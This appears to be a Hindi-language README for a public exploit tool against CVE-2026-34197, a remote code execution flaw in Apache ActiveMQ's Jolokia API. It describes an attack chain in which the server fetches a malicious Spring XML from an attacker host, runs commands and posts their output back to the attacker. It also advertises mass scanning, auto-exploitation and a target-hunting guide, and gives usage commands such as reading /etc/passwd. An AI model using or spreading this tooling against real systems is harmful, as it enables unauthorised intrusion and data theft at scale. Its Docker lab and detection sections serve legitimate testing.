
Apache ActiveMQ में Jolokia API के माध्यम से RCE (CVE-2026-34197) के लिए एक्सप्लॉइट, जिसमें कमांड आउटपुट कैप्चर, मास स्कैनिंग और ऑटो-एक्सप्लॉइटेशन शामिल है।
अवलोकन • विवरण • हमले का प्रवाह • त्वरित आरंभ • ATTACKER_IP गाइड • उपयोग • आउटपुट कैप्चर • स्कैनर • खोज • पहचान • सुधार
CVE-2026-34197 Apache ActiveMQ Classic में एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है, जो एक प्रमाणित हमलावर को वेब कंसोल पर उजागर Jolokia API के माध्यम से मनमाने ऑपरेटिंग सिस्टम कमांड निष्पादित करने की अनुमति देती है।
यह भेद्यता 13 वर्षों से अधिक समय से मौजूद है और Jolokia (HTTP-JMX ब्रिज), ActiveMQ MBeans, नेटवर्क कनेक्टर और VM ट्रांसपोर्ट के बीच परस्पर क्रिया में निहित है।
[!CAUTION] यह KONDOR DEV SECURITY द्वारा विकसित पहला सार्वजनिक PoC है। केवल अधिकृत सुरक्षा मूल्यांकन में उपयोग करें।
id, whoami, cat /etc/passwd) स्वचालित रूप से आपके टर्मिनल में अपना आउटपुट प्रदर्शित करते हैंversion_check.py) — मल्टीथ्रेडेड संस्करण पहचान + लक्षित शोषण| CVE ID | CVE-2026-34197 |
| गंभीरता | |
| प्रकार | रिमोट कोड निष्पादन (RCE) |
| CWE | CWE-20 (अनुचित इनपुट सत्यापन) / CWE-94 (कोड इंजेक्शन) |
| प्रभावित | ActiveMQ Classic < 5.19.4 और 6.0.0 — 6.2.2 |
| पैच किया गया | 5.19.4 / 6.2.3 |
| प्रमाणीकरण आवश्यक | हाँ (डिफ़ॉल्ट क्रेडेंशियल admin:admin सामान्य हैं) |
| No Auth आवश्यक नहीं | 6.0.0 — 6.1.1 (CVE-2024-32114 के कारण) |
| डिफ़ॉल्ट पोर्ट | 8161 (वेब कंसोल) |
CVE-2026-34197 — Exploitation Chain
──────────────────────────────────────────────────────────────
ATTACKER ACTIVEMQ SERVER ──────── ─────────────── │ │ [1] │── POST /api/jolokia/ ──────────────────>│ │ addNetworkConnector( │ │ vm://rce?brokerConfig= │ │ xbean:http://ATTACKER/payload.xml) │ │ │ │ [2] │── Creates VM broker │ │── Fetches remote XML │ │ [3] │<── GET /payload.xml ─────────────────────│ │── Serves malicious Spring XML ─────────>│ │ │ │ [4] │── Spring instantiates beans │ │── Runtime.exec(COMMAND) │ │── ** RCE ACHIEVED ** │ │ [5] │<── POST /output (command stdout) ────────│ (auto, for simple commands) │── Displays command output │ │ │
### चरण-दर-चरण विवरण
| चरण | क्रिया | घटक |
|:----:|--------|-----------|
| **1** | हमलावर Broker MBean पर `addNetworkConnector` को आमंत्रित करते हुए `/api/jolokia/` पर POST भेजता है | Jolokia API |
| **2** | ActiveMQ `vm://` ट्रांसपोर्ट URI को संसाधित करता है और `brokerConfig` को दूरस्थ URL की ओर इंगित करते हुए एक अस्थायी broker बनाता है | VM Transport |
| **3** | `xbean:` स्कीम हमलावर के सर्वर से Spring XML कॉन्फ़िगरेशन फ़ाइल का डाउनलोड ट्रिगर करती है | Spring / XBean |
| **4** | Spring XML में सभी beans को इंस्टैंशिएट करता है, जिसमें वह भी शामिल है जो `Runtime.getRuntime().exec()` को कॉल करता है | Spring Context |
| **5** | सरल कमांड के लिए, आउटपुट कैप्चर किया जाता है और HTTP POST के माध्यम से हमलावर के लिसनर को वापस भेजा जाता है (स्वचालित) | Output Capture |
---
## प्रोजेक्ट संरचना```
CVE-2026-34197/
├── exploit.py # PoC exploit (single target + mass scan)
├── version_check.py # Scanner + Auto-Exploit (2-phase pipeline)
├── payloads/
│ └── template.xml # Spring XML payload template
├── targets.txt # Target URLs (one per line)
├── docker/
│ └── docker-compose.yml # Vulnerable lab environment
├── docs/
│ ├── HUNTING_GUIDE_EN.md # Target hunting guide (English)
│ └── HUNTING_GUIDE_ES.md # Guía de búsqueda (Español)
├── LICENSE
└── README.md
pip install requests
### लैब वातावरण (Docker)```bash
cd docker
docker-compose up -d
# ActiveMQ Classic 5.18.6 (vulnerable) → localhost:8161
python exploit.py -t http://TARGET:8161 -l YOUR_IP -c "id"